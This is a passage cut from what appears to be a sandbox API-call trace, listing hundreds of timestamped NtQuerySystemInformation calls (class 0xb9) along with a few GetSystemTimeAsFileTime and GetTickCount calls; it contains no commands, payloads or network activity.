SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.251] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d0f0 | out: lpSystemTimeAsFileTime=0xa78207d0f0*(dwLowDateTime=0x36c3fc78, dwHighDateTime=0x1d6666a)) [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff8, Length=0x50, ResultLength=0x0) [0284.251] GetTickCount () returned 0x11871e2 [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0284.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0284.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x28, ResultLength=0x0) [0284.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0284.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0284.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0284.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0284.302] NtQuerySystemInformation 